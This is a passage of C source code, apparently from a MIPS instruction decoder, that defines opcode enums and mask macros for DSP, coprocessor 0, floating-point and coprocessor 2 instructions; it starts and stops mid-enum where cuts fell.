OPC_PRECRQ_RS_PH_W = (0x15 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PRECRQU_S_QB_PH = (0x0F << 6) | OPC_CMPU_EQ_QB_DSP, /* DSP Compare-Pick Sub-class */ OPC_CMPU_EQ_QB = (0x00 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPU_LT_QB = (0x01 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPU_LE_QB = (0x02 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGU_EQ_QB = (0x04 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGU_LT_QB = (0x05 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGU_LE_QB = (0x06 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGDU_EQ_QB = (0x18 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGDU_LT_QB = (0x19 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMPGDU_LE_QB = (0x1A << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMP_EQ_PH = (0x08 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMP_LT_PH = (0x09 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_CMP_LE_PH = (0x0A << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PICK_QB = (0x03 << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PICK_PH = (0x0B << 6) | OPC_CMPU_EQ_QB_DSP, OPC_PACKRL_PH = (0x0E << 6) | OPC_CMPU_EQ_QB_DSP, }; #define MASK_SHLL_QB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP GPR-Based Shift Sub-class */ OPC_SHLL_QB = (0x00 << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_QB = (0x02 << 6) | OPC_SHLL_QB_DSP, OPC_SHLL_PH = (0x08 << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_PH = (0x0A << 6) | OPC_SHLL_QB_DSP, OPC_SHLL_S_PH = (0x0C << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_S_PH = (0x0E << 6) | OPC_SHLL_QB_DSP, OPC_SHLL_S_W = (0x14 << 6) | OPC_SHLL_QB_DSP, OPC_SHLLV_S_W = (0x16 << 6) | OPC_SHLL_QB_DSP, OPC_SHRL_QB = (0x01 << 6) | OPC_SHLL_QB_DSP, OPC_SHRLV_QB = (0x03 << 6) | OPC_SHLL_QB_DSP, OPC_SHRL_PH = (0x19 << 6) | OPC_SHLL_QB_DSP, OPC_SHRLV_PH = (0x1B << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_QB = (0x04 << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_R_QB = (0x05 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_QB = (0x06 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_R_QB = (0x07 << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_PH = (0x09 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_PH = (0x0B << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_R_PH = (0x0D << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_R_PH = (0x0F << 6) | OPC_SHLL_QB_DSP, OPC_SHRA_R_W = (0x15 << 6) | OPC_SHLL_QB_DSP, OPC_SHRAV_R_W = (0x17 << 6) | OPC_SHLL_QB_DSP, }; #define MASK_DPA_W_PH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Multiply Sub-class insns */ OPC_DPAU_H_QBL = (0x03 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAU_H_QBR = (0x07 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSU_H_QBL = (0x0B << 6) | OPC_DPA_W_PH_DSP, OPC_DPSU_H_QBR = (0x0F << 6) | OPC_DPA_W_PH_DSP, OPC_DPA_W_PH = (0x00 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAX_W_PH = (0x08 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQ_S_W_PH = (0x04 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQX_S_W_PH = (0x18 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQX_SA_W_PH = (0x1A << 6) | OPC_DPA_W_PH_DSP, OPC_DPS_W_PH = (0x01 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSX_W_PH = (0x09 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQ_S_W_PH = (0x05 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQX_S_W_PH = (0x19 << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQX_SA_W_PH = (0x1B << 6) | OPC_DPA_W_PH_DSP, OPC_MULSAQ_S_W_PH = (0x06 << 6) | OPC_DPA_W_PH_DSP, OPC_DPAQ_SA_L_W = (0x0C << 6) | OPC_DPA_W_PH_DSP, OPC_DPSQ_SA_L_W = (0x0D << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_S_W_PHL = (0x14 << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_S_W_PHR = (0x16 << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_SA_W_PHL = (0x10 << 6) | OPC_DPA_W_PH_DSP, OPC_MAQ_SA_W_PHR = (0x12 << 6) | OPC_DPA_W_PH_DSP, OPC_MULSA_W_PH = (0x02 << 6) | OPC_DPA_W_PH_DSP, }; #define MASK_INSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Bit/Manipulation Sub-class */ OPC_INSV = (0x00 << 6) | OPC_INSV_DSP, }; #define MASK_APPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Append Sub-class */ OPC_APPEND = (0x00 << 6) | OPC_APPEND_DSP, OPC_PREPEND = (0x01 << 6) | OPC_APPEND_DSP, OPC_BALIGN = (0x10 << 6) | OPC_APPEND_DSP, }; #define MASK_EXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Accumulator and DSPControl Access Sub-class */ OPC_EXTR_W = (0x00 << 6) | OPC_EXTR_W_DSP, OPC_EXTR_R_W = (0x04 << 6) | OPC_EXTR_W_DSP, OPC_EXTR_RS_W = (0x06 << 6) | OPC_EXTR_W_DSP, OPC_EXTR_S_H = (0x0E << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_S_H = (0x0F << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_W = (0x01 << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_R_W = (0x05 << 6) | OPC_EXTR_W_DSP, OPC_EXTRV_RS_W = (0x07 << 6) | OPC_EXTR_W_DSP, OPC_EXTP = (0x02 << 6) | OPC_EXTR_W_DSP, OPC_EXTPV = (0x03 << 6) | OPC_EXTR_W_DSP, OPC_EXTPDP = (0x0A << 6) | OPC_EXTR_W_DSP, OPC_EXTPDPV = (0x0B << 6) | OPC_EXTR_W_DSP, OPC_SHILO = (0x1A << 6) | OPC_EXTR_W_DSP, OPC_SHILOV = (0x1B << 6) | OPC_EXTR_W_DSP, OPC_MTHLIP = (0x1F << 6) | OPC_EXTR_W_DSP, OPC_WRDSP = (0x13 << 6) | OPC_EXTR_W_DSP, OPC_RDDSP = (0x12 << 6) | OPC_EXTR_W_DSP, }; #define MASK_ABSQ_S_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Arithmetic Sub-class */ OPC_PRECEQ_L_PWL = (0x14 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_L_PWR = (0x15 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHL = (0x0C << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHR = (0x0D << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHLA = (0x0E << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQ_PW_QHRA = (0x0F << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBL = (0x04 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBR = (0x05 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBLA = (0x06 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEQU_QH_OBRA = (0x07 << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBL = (0x1C << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBR = (0x1D << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBLA = (0x1E << 6) | OPC_ABSQ_S_QH_DSP, OPC_PRECEU_QH_OBRA = (0x1F << 6) | OPC_ABSQ_S_QH_DSP, OPC_ABSQ_S_OB = (0x01 << 6) | OPC_ABSQ_S_QH_DSP, OPC_ABSQ_S_PW = (0x11 << 6) | OPC_ABSQ_S_QH_DSP, OPC_ABSQ_S_QH = (0x09 << 6) | OPC_ABSQ_S_QH_DSP, /* DSP Bit/Manipulation Sub-class */ OPC_REPL_OB = (0x02 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPL_PW = (0x12 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPL_QH = (0x0A << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPLV_OB = (0x03 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPLV_PW = (0x13 << 6) | OPC_ABSQ_S_QH_DSP, OPC_REPLV_QH = (0x0B << 6) | OPC_ABSQ_S_QH_DSP, }; #define MASK_ADDU_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Multiply Sub-class insns */ OPC_MULEQ_S_PW_QHL = (0x1C << 6) | OPC_ADDU_OB_DSP, OPC_MULEQ_S_PW_QHR = (0x1D << 6) | OPC_ADDU_OB_DSP, OPC_MULEU_S_QH_OBL = (0x06 << 6) | OPC_ADDU_OB_DSP, OPC_MULEU_S_QH_OBR = (0x07 << 6) | OPC_ADDU_OB_DSP, OPC_MULQ_RS_QH = (0x1F << 6) | OPC_ADDU_OB_DSP, /* MIPS DSP Arithmetic Sub-class */ OPC_RADDU_L_OB = (0x14 << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_PW = (0x13 << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_S_PW = (0x17 << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_QH = (0x0B << 6) | OPC_ADDU_OB_DSP, OPC_SUBQ_S_QH = (0x0F << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_OB = (0x01 << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_S_OB = (0x05 << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_QH = (0x09 << 6) | OPC_ADDU_OB_DSP, OPC_SUBU_S_QH = (0x0D << 6) | OPC_ADDU_OB_DSP, OPC_SUBUH_OB = (0x19 << 6) | OPC_ADDU_OB_DSP, OPC_SUBUH_R_OB = (0x1B << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_PW = (0x12 << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_S_PW = (0x16 << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_QH = (0x0A << 6) | OPC_ADDU_OB_DSP, OPC_ADDQ_S_QH = (0x0E << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_OB = (0x00 << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_S_OB = (0x04 << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_QH = (0x08 << 6) | OPC_ADDU_OB_DSP, OPC_ADDU_S_QH = (0x0C << 6) | OPC_ADDU_OB_DSP, OPC_ADDUH_OB = (0x18 << 6) | OPC_ADDU_OB_DSP, OPC_ADDUH_R_OB = (0x1A << 6) | OPC_ADDU_OB_DSP, }; #define MASK_CMPU_EQ_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Compare-Pick Sub-class */ OPC_CMP_EQ_PW = (0x10 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LT_PW = (0x11 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LE_PW = (0x12 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_EQ_QH = (0x08 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LT_QH = (0x09 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMP_LE_QH = (0x0A << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGDU_EQ_OB = (0x18 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGDU_LT_OB = (0x19 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGDU_LE_OB = (0x1A << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGU_EQ_OB = (0x04 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGU_LT_OB = (0x05 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPGU_LE_OB = (0x06 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPU_EQ_OB = (0x00 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPU_LT_OB = (0x01 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_CMPU_LE_OB = (0x02 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PACKRL_PW = (0x0E << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PICK_OB = (0x03 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PICK_PW = (0x13 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PICK_QH = (0x0B << 6) | OPC_CMPU_EQ_OB_DSP, /* MIPS DSP Arithmetic Sub-class */ OPC_PRECR_OB_QH = (0x0D << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECR_SRA_QH_PW = (0x1E << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECR_SRA_R_QH_PW = (0x1F << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_OB_QH = (0x0C << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_PW_L = (0x1C << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_QH_PW = (0x14 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQ_RS_QH_PW = (0x15 << 6) | OPC_CMPU_EQ_OB_DSP, OPC_PRECRQU_S_OB_QH = (0x0F << 6) | OPC_CMPU_EQ_OB_DSP, }; #define MASK_DAPPEND(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Append Sub-class */ OPC_DAPPEND = (0x00 << 6) | OPC_DAPPEND_DSP, OPC_PREPENDD = (0x03 << 6) | OPC_DAPPEND_DSP, OPC_PREPENDW = (0x01 << 6) | OPC_DAPPEND_DSP, OPC_DBALIGN = (0x10 << 6) | OPC_DAPPEND_DSP, }; #define MASK_DEXTR_W(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Accumulator and DSPControl Access Sub-class */ OPC_DMTHLIP = (0x1F << 6) | OPC_DEXTR_W_DSP, OPC_DSHILO = (0x1A << 6) | OPC_DEXTR_W_DSP, OPC_DEXTP = (0x02 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTPDP = (0x0A << 6) | OPC_DEXTR_W_DSP, OPC_DEXTPDPV = (0x0B << 6) | OPC_DEXTR_W_DSP, OPC_DEXTPV = (0x03 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_L = (0x10 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_R_L = (0x14 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_RS_L = (0x16 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_W = (0x00 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_R_W = (0x04 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_RS_W = (0x06 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTR_S_H = (0x0E << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_L = (0x11 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_R_L = (0x15 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_RS_L = (0x17 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_S_H = (0x0F << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_W = (0x01 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_R_W = (0x05 << 6) | OPC_DEXTR_W_DSP, OPC_DEXTRV_RS_W = (0x07 << 6) | OPC_DEXTR_W_DSP, OPC_DSHILOV = (0x1B << 6) | OPC_DEXTR_W_DSP, }; #define MASK_DINSV(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* DSP Bit/Manipulation Sub-class */ OPC_DINSV = (0x00 << 6) | OPC_DINSV_DSP, }; #define MASK_DPAQ_W_QH(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP Multiply Sub-class insns */ OPC_DMADD = (0x19 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DMADDU = (0x1D << 6) | OPC_DPAQ_W_QH_DSP, OPC_DMSUB = (0x1B << 6) | OPC_DPAQ_W_QH_DSP, OPC_DMSUBU = (0x1F << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPA_W_QH = (0x00 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAQ_S_W_QH = (0x04 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAQ_SA_L_PW = (0x0C << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAU_H_OBL = (0x03 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPAU_H_OBR = (0x07 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPS_W_QH = (0x01 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSQ_S_W_QH = (0x05 << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSQ_SA_L_PW = (0x0D << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSU_H_OBL = (0x0B << 6) | OPC_DPAQ_W_QH_DSP, OPC_DPSU_H_OBR = (0x0F << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_L_PWL = (0x1C << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_L_PWR = (0x1E << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHLL = (0x14 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHLL = (0x10 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHLR = (0x15 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHLR = (0x11 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHRL = (0x16 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHRL = (0x12 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_S_W_QHRR = (0x17 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MAQ_SA_W_QHRR = (0x13 << 6) | OPC_DPAQ_W_QH_DSP, OPC_MULSAQ_S_L_PW = (0x0E << 6) | OPC_DPAQ_W_QH_DSP, OPC_MULSAQ_S_W_QH = (0x06 << 6) | OPC_DPAQ_W_QH_DSP, }; #define MASK_SHLL_OB(op) (MASK_SPECIAL3(op) | (op & (0x1F << 6))) enum { /* MIPS DSP GPR-Based Shift Sub-class */ OPC_SHLL_PW = (0x10 << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_S_PW = (0x14 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_OB = (0x02 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_PW = (0x12 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_S_PW = (0x16 << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_QH = (0x0A << 6) | OPC_SHLL_OB_DSP, OPC_SHLLV_S_QH = (0x0E << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_PW = (0x11 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_R_PW = (0x15 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_OB = (0x06 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_R_OB = (0x07 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_PW = (0x13 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_R_PW = (0x17 << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_QH = (0x0B << 6) | OPC_SHLL_OB_DSP, OPC_SHRAV_R_QH = (0x0F << 6) | OPC_SHLL_OB_DSP, OPC_SHRLV_OB = (0x03 << 6) | OPC_SHLL_OB_DSP, OPC_SHRLV_QH = (0x1B << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_OB = (0x00 << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_QH = (0x08 << 6) | OPC_SHLL_OB_DSP, OPC_SHLL_S_QH = (0x0C << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_OB = (0x04 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_R_OB = (0x05 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_QH = (0x09 << 6) | OPC_SHLL_OB_DSP, OPC_SHRA_R_QH = (0x0D << 6) | OPC_SHLL_OB_DSP, OPC_SHRL_OB = (0x01 << 6) | OPC_SHLL_OB_DSP, OPC_SHRL_QH = (0x19 << 6) | OPC_SHLL_OB_DSP, }; /* Coprocessor 0 (rs field) */ #define MASK_CP0(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21))) enum { OPC_MFC0 = (0x00 << 21) | OPC_CP0, OPC_DMFC0 = (0x01 << 21) | OPC_CP0, OPC_MFHC0 = (0x02 << 21) | OPC_CP0, OPC_MTC0 = (0x04 << 21) | OPC_CP0, OPC_DMTC0 = (0x05 << 21) | OPC_CP0, OPC_MTHC0 = (0x06 << 21) | OPC_CP0, OPC_MFTR = (0x08 << 21) | OPC_CP0, OPC_RDPGPR = (0x0A << 21) | OPC_CP0, OPC_MFMC0 = (0x0B << 21) | OPC_CP0, OPC_MTTR = (0x0C << 21) | OPC_CP0, OPC_WRPGPR = (0x0E << 21) | OPC_CP0, OPC_C0 = (0x10 << 21) | OPC_CP0, OPC_C0_1 = (0x11 << 21) | OPC_CP0, OPC_C0_2 = (0x12 << 21) | OPC_CP0, OPC_C0_3 = (0x13 << 21) | OPC_CP0, OPC_C0_4 = (0x14 << 21) | OPC_CP0, OPC_C0_5 = (0x15 << 21) | OPC_CP0, OPC_C0_6 = (0x16 << 21) | OPC_CP0, OPC_C0_7 = (0x17 << 21) | OPC_CP0, OPC_C0_8 = (0x18 << 21) | OPC_CP0, OPC_C0_9 = (0x19 << 21) | OPC_CP0, OPC_C0_A = (0x1A << 21) | OPC_CP0, OPC_C0_B = (0x1B << 21) | OPC_CP0, OPC_C0_C = (0x1C << 21) | OPC_CP0, OPC_C0_D = (0x1D << 21) | OPC_CP0, OPC_C0_E = (0x1E << 21) | OPC_CP0, OPC_C0_F = (0x1F << 21) | OPC_CP0, }; /* MFMC0 opcodes */ #define MASK_MFMC0(op) (MASK_CP0(op) | (op & 0xFFFF)) enum { OPC_DMT = 0x01 | (0 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0, OPC_EMT = 0x01 | (1 << 5) | (0x0F << 6) | (0x01 << 11) | OPC_MFMC0, OPC_DVPE = 0x01 | (0 << 5) | OPC_MFMC0, OPC_EVPE = 0x01 | (1 << 5) | OPC_MFMC0, OPC_DI = (0 << 5) | (0x0C << 11) | OPC_MFMC0, OPC_EI = (1 << 5) | (0x0C << 11) | OPC_MFMC0, OPC_DVP = 0x04 | (0 << 3) | (1 << 5) | (0 << 11) | OPC_MFMC0, OPC_EVP = 0x04 | (0 << 3) | (0 << 5) | (0 << 11) | OPC_MFMC0, }; /* Coprocessor 0 (with rs == C0) */ #define MASK_C0(op) (MASK_CP0(op) | (op & 0x3F)) enum { OPC_TLBR = 0x01 | OPC_C0, OPC_TLBWI = 0x02 | OPC_C0, OPC_TLBINV = 0x03 | OPC_C0, OPC_TLBINVF = 0x04 | OPC_C0, OPC_TLBWR = 0x06 | OPC_C0, OPC_TLBP = 0x08 | OPC_C0, OPC_RFE = 0x10 | OPC_C0, OPC_ERET = 0x18 | OPC_C0, OPC_DERET = 0x1F | OPC_C0, OPC_WAIT = 0x20 | OPC_C0, }; /* Coprocessor 1 (rs field) */ #define MASK_CP1(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21))) /* Values for the fmt field in FP instructions */ enum { /* 0 - 15 are reserved */ FMT_S = 16, /* single fp */ FMT_D = 17, /* double fp */ FMT_E = 18, /* extended fp */ FMT_Q = 19, /* quad fp */ FMT_W = 20, /* 32-bit fixed */ FMT_L = 21, /* 64-bit fixed */ FMT_PS = 22, /* paired single fp */ /* 23 - 31 are reserved */ }; enum { OPC_MFC1 = (0x00 << 21) | OPC_CP1, OPC_DMFC1 = (0x01 << 21) | OPC_CP1, OPC_CFC1 = (0x02 << 21) | OPC_CP1, OPC_MFHC1 = (0x03 << 21) | OPC_CP1, OPC_MTC1 = (0x04 << 21) | OPC_CP1, OPC_DMTC1 = (0x05 << 21) | OPC_CP1, OPC_CTC1 = (0x06 << 21) | OPC_CP1, OPC_MTHC1 = (0x07 << 21) | OPC_CP1, OPC_BC1 = (0x08 << 21) | OPC_CP1, /* bc */ OPC_BC1ANY2 = (0x09 << 21) | OPC_CP1, OPC_BC1ANY4 = (0x0A << 21) | OPC_CP1, OPC_BZ_V = (0x0B << 21) | OPC_CP1, OPC_BNZ_V = (0x0F << 21) | OPC_CP1, OPC_S_FMT = (FMT_S << 21) | OPC_CP1, OPC_D_FMT = (FMT_D << 21) | OPC_CP1, OPC_E_FMT = (FMT_E << 21) | OPC_CP1, OPC_Q_FMT = (FMT_Q << 21) | OPC_CP1, OPC_W_FMT = (FMT_W << 21) | OPC_CP1, OPC_L_FMT = (FMT_L << 21) | OPC_CP1, OPC_PS_FMT = (FMT_PS << 21) | OPC_CP1, OPC_BC1EQZ = (0x09 << 21) | OPC_CP1, OPC_BC1NEZ = (0x0D << 21) | OPC_CP1, OPC_BZ_B = (0x18 << 21) | OPC_CP1, OPC_BZ_H = (0x19 << 21) | OPC_CP1, OPC_BZ_W = (0x1A << 21) | OPC_CP1, OPC_BZ_D = (0x1B << 21) | OPC_CP1, OPC_BNZ_B = (0x1C << 21) | OPC_CP1, OPC_BNZ_H = (0x1D << 21) | OPC_CP1, OPC_BNZ_W = (0x1E << 21) | OPC_CP1, OPC_BNZ_D = (0x1F << 21) | OPC_CP1, }; #define MASK_CP1_FUNC(op) (MASK_CP1(op) | (op & 0x3F)) #define MASK_BC1(op) (MASK_CP1(op) | (op & (0x3 << 16))) enum { OPC_BC1F = (0x00 << 16) | OPC_BC1, OPC_BC1T = (0x01 << 16) | OPC_BC1, OPC_BC1FL = (0x02 << 16) | OPC_BC1, OPC_BC1TL = (0x03 << 16) | OPC_BC1, }; enum { OPC_BC1FANY2 = (0x00 << 16) | OPC_BC1ANY2, OPC_BC1TANY2 = (0x01 << 16) | OPC_BC1ANY2, }; enum { OPC_BC1FANY4 = (0x00 << 16) | OPC_BC1ANY4, OPC_BC1TANY4 = (0x01 << 16) | OPC_BC1ANY4, }; #define MASK_CP2(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21))) enum { OPC_MFC2 = (0x00 << 21) | OPC_CP2, OPC_DMFC2 = (0x01 << 21) | OPC_CP2, OPC_CFC2 = (0x02 << 21) | OPC_CP2, OPC_MFHC2 = (0x03 << 21) | OPC_CP2, OPC_MTC2 = (0x04 << 21) | OPC_CP2, OPC_DMTC2 = (0x05 << 21) | OPC_CP2, OPC_CTC2 = (0x06 << 21) | OPC_CP2, OPC_MTHC2 = (0x07 << 21) | OPC_CP2, OPC_BC2 = (0x08 << 21) | OPC_CP2, OPC_BC2EQZ = (0x09 << 21) | OPC_CP2, OPC_BC2NEZ = (0x0D << 21) | OPC_CP2, }; #define MASK_LMI(op) (MASK_OP_MAJOR(op) | (op & (0x1F << 21)) | (op & 0x1F)) enum { OPC_PADDSH = (24 << 21) | (0x00) | OPC_CP2, OPC_PADDUSH = (25 << 21) | (0x00) | OPC_CP2, OPC_PADDH = (26 << 21) | (0x00) | OPC_CP2, OPC_PADDW = (27 << 21) | (0x00) | OPC_CP2, OPC_PADDSB = (28 << 21) | (0x00) | OPC_CP2, OPC_PADDUSB = (29 << 21) | (0x00) | OPC_CP2, OPC_PADDB = (30 << 21) | (0x00) | OPC_CP2, OPC_PADDD = (31 << 21) | (0x00) | OPC_CP2, OPC_PSUBSH = (24 << 21) | (0x01) | OPC_CP2, OPC_PSUBUSH = (25 << 21) | (0x01) | OPC_CP2, OPC_PSUBH = (26 << 21) | (0x01) | OPC_CP2, OPC_PSUBW = (27 << 21) | (0x01) | OPC_CP2, OPC_PSUBSB = (28 << 21) | (0x01) | OPC_CP2, OPC_PSUBUSB = (29 << 21) | (0x01) | OPC_CP2, OPC_PSUBB = (30 << 21) | (0x01) | OPC_CP2, OPC_PSUBD = (31 << 21) | (0x01) | OPC_CP2, OPC_PSHUFH = (24 << 21) | (0x02) | OPC_CP2, OPC_PACKSSWH = (25 << 21) | (0x02) | OPC_CP2, OPC_PACKSSHB = (26 << 21) | (0x02) | OPC_CP2, OPC_PACKUSHB = (27 << 21) | (0x02) | OPC_CP2, OPC_XOR_CP2 = (28 << 21) | (0x02) | OPC_CP2, OPC_NOR_CP2 = (29 << 21) | (0x02) | OPC_CP2, OPC_AND_CP2 = (30 << 21) | (0x02) | OPC_CP2, 